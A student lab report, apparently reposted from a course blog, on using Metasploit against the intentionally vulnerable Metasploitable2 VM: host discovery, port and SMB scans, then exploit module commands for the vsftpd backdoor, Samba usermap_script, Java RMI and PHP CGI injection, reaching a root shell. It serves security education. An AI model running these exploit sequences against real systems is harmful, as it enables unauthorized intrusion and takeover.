20222301 2024-2025-1 《网络与系统攻防技术》实验六实验报告

news/2024/11/17 10:15:18/文章来源:https://www.cnblogs.com/cici20040524/p/18550299

1.实验内容

1.1 本周学习内容回顾

本文采用了Metasploit框架,这是一款功能强大的渗透测试工具。Metasploit提供了丰富的攻击模块,涵盖远程代码执行、服务拒绝、提权等多种攻击方式,支持对多种操作系统和应用程序进行测试。除了漏洞利用,Metasploit还具备强大的后渗透功能,如键盘记录、文件上传下载、网络嗅探等。此外,还使用了nmap、Nessus等信息收集工具,用于漏洞检测和信息收集等操作。

1.2 实验要求

本次实践旨在熟练掌握Metasploit的使用方法。请参考Rapid7官方提供的指导教程,网址为:https://docs.rapid7.com/metasploit/metasploitable-2-exploitability-guide/。
下载官方靶机Metasploitable2,并按要求完成实验内容。
查询靶机IP地址,得到结果为192.168.1.8
image

2.实验过程

2.1 前期渗透

2.1.1 主机发现

search arp_sweep
use 0
set RHOSTS 192.168.1.0/24
set THREADS 30
exploit
image
从图中可以看到,我们已经成功的查询到靶机:192.168.1.8

2.1.2 端口扫描:可以直接用nmap,也可以用Aux中的portscan/tcp等

search portscan/tcp
use 0
set RHOSTS 192.168.1.8
exploit
image

2.1.3 扫描系统版本、漏洞

search auxiliary/scanner/smb/smb_version
use 0
set RHOSTS 192.168.1.8
exploit
image
从图中可见,目标主机运行的是Unix操作系统,版本为Samba 3.0.20-Debian,并使用SMBv1协议,存在已知漏洞。

2.2 Vsftpd源码包后门漏洞(21端口)

漏洞原理:在特定版本的vsftpd服务器中,若用户名以“😃”结尾,服务器将在6200端口监听并允许执行任意代码,存在严重安全漏洞。
search exploit/unix/ftp/vsftpd_234_backdoor
use 0
set RHOST 192.168.1.8
exploit
攻击完以后,输入pwd、uname -a、id等指令检测是否攻击成功。
image

2.3 SambaMS-RPC Shell命令注入漏洞(端口139)

漏洞原理:Samba 中负责更新 SAM 数据库用户口令的代码,未对用户输入进行过滤即传输给 /bin/sh。若在调用 smb.conf 中定义的外部脚本时,通过 MS-RPC 调用提交恶意输入,可能使攻击者以 nobody 用户权限执行任意命令。
search exploit/multi/samba/usermap_script
use 0
set RHOST 192.168.1.8
exploit
利用成功 执行uname–a验证
image

2.4 Java RMI SERVER命令执行漏洞(1099端口)

漏洞原理:Java RMI Server的RMI注册表和RMI激活服务的默认配置存在安全漏洞,可被利用导致代码执行。
首先,根据以前的TCP扫描得出的结果,可以得知1099端口已开放。
image
search exploit/multi/misc/java_rmi_server
use 0
set RHOST 192.168.1.8
exploit
image
执行攻击后,使用指令sessions -i 3进入任务
再输入shell,利用whoami指令验证,得到结果:root
image

2.5 PHP CGI参数执行注入漏洞(80端口)

漏洞原理:CGI脚本未能正确处理请求参数,导致源代码泄露,并允许远程攻击者通过请求参数插入并执行命令。
search exploit/multi/http/php_cgi_arg_injection
use 0
set RHOST 192.168.1.8
exploit
攻击成功,输入dir验证:
image

3.问题及解决方案

实验进展顺利,未遇问题。

4.学习感悟、思考等

此次实验总体较为简单,因此未遇到太多困难。在实验过程中,我深刻体会到Metasploit框架的强大与灵活性。Metasploit的模块化结构和自动化能力显著提升了攻击效率,不仅支持各种已知漏洞的利用,还集成了扫描、信息收集和社会工程学攻击等工具。借助Metasploit,我能够迅速发现目标系统的漏洞,并利用这些漏洞实现远程控制。这不仅让我感受到站在前人肩膀上的优势,更使我深刻认识到网络安全的重要性。总体而言,此次实验不仅提升了我的技术能力,增强了我对网络攻防课程的兴趣,也让我对网络安全有了更加全面的理解。

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.hqwc.cn/news/835221.html

如若内容造成侵权/违法违规/事实不符,请联系编程知识网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

2021陇剑杯-流量分析

1.昨天,单位流量系统捕获了⿊客攻击流量,请您分析流量后进⾏回答:该⽹站使⽤了( )认证方式?(如有字母则默认小写) 注意:此附件适用于jwt所有系列 网站使用的认证方式主要有: Session机制JWTOAuth2CookieHTTP Basic AuthOpenID Connect双因素认证这题使用的是cookiejwt解密…

CTFshow黑盒测试刷题

web380 先扫目录打开报错了先用伪协议去查看源码之前扫到有flag.php 访问一下就得到flag了 web381 查看一下源码点击第三个css藏在目录里面 web382 跟上题一样不过访问这个页面是一个登录框 试一下弱口令 最后是admin admin888 就进去了web383 ![](https://cdn.nlark.com/yuque…

[BSidesCF 2020]Had a bad day 1

[BSidesCF 2020]Had a bad day 1 打开实例为一个随机猫狗图片网页点击WOOFERS,显示出一张狗子的图片,并发现参数?category=woofers尝试sql注入验证,闭合,发现报错信息发现include_path函数,猜测可能存在文件包含 构造payload,尝试读取index.php ?category=php://filter…

2024御宛杯

2024御宛杯图片的隐藏题目提示6位数字爆破一下改个宽高扫描就行NYSEC{abcdefghiklmn}啥玩意啊这赛博厨子flag{HNCTFbs345680967709b5}List of file signatures每四个字节翻转f=open("fl4g.jpeg",rb)ff=open("out.jpeg","wb")a=f.read()l=len(a)f…

ctfshow图片刷题

misc1 打开就是flagctfshow{22f1fb91fc4169f1c9411ce632a0ed8d} misc2 改后缀名pngctfshow{6f66202f21ad22a2a19520cdd3f69e7b} misc3 .bpg的图片 用这个工具打开 https://bellard.org/bpg/ctfshow{aade771916df7cde3009c0e631f9910d} misc4 逐个改后缀名就可以得到图片,合起来…

windows服务器应急响应

windows服务器应急响应首先环境是这样的,比linux应急响应好多了,有图形界面...1.请提交攻击者攻击成功的第一时间,格式:YY:MM:DD hh:mm:ss在phpstudy目录下搜索日志文件省赛用的是别人的工具,只能肉眼观察喽,个人习惯于010,可惜省赛有可能不提供...这条是登录了管理员账…

DIDCTF-2022暑假取证学习

DIDCTF-2022暑假取证学习1.请找出操作系统主机名WIN-49I0SNRJAMF2.请给出源磁盘的SHA256哈希值。这个软件没找到Autopsy 这个软件计算时间太长了,就...3.请找出操作系统中安装的Android模拟器名称和安装日期。格式:模拟器名时间例子:雷电模拟器2022年06月23日夜神模拟器2021…

2024腾龙杯-easy_Forensics

2024腾龙杯-easy_Forensicsvol.py -f 3.img --profile=Win7SP1x64 filescan | grep -E "png|zip|rar|jpg|txt"找到一张图片提取出来发现有压缩包分离出来解压得镜像导出来镜像里面是一个hint.txt打开是坐标,需要画图直接用gnuplot画图解码就行Here is the vigenere …

团队项目Scrum冲刺-day6

一、每天举行站立式会议 站立式会议照片一张 昨天已完成的工作成员 任务陈国金 代码沙箱Java实现凌枫 创建题目页面部分内容陈卓恒 更新题目界面谭立业 浏览题目页面廖俊龙 接口测试曾平凡 前端页面测试曾俊涛 协助代码沙箱Java实现薛秋昊 协助代码沙箱Java实现今天计划完成的工…

2024GHCTF的三道取证题

2024GHCTF的三道取证题[GHCTF 2024 新生赛]皆非取证vol.py -f chall.vmem --profile=Win7SP1x64 filescan | grep zip找到压缩包vol.py -f chall.vmem --profile=Win7SP1x64 mimikatzmrl64l0v3miku这个是密码,解压得flag[GHCTF 2024 新生赛]是名取证vol.py -f chall.vmem --pr…

NSSRound#12 Basic-ordinary forensics

NSSRound#12 Basic-ordinary forensics[NSSRound#12 Basic]ordinary forensicsvol.py -f forensics.raw --profile=Win7SP1x64 cmdscan找到了一个密码U_find_1tvol.py -f forensics.raw --profile=Win7SP1x64 filescan | grep zip提取这个压缩包vol.py -f forensics.raw --prof…

2024BaseCTF-re

BaseCTF-reYou are good at IDA直接按F5得到一地段flagY0u_4Re_第二段提示F12双击打开按x900d_47_最后一段提示在Interesting函数之中id4BaseCTF{Y0u_4Re_900d_47_id4}UPX mini先脱壳拖入IDA,base64解码就好BasePlusF5找到key0xEbase64换表+异或BaseCTF{BA5e_DEcoD1N6_sEcr3t…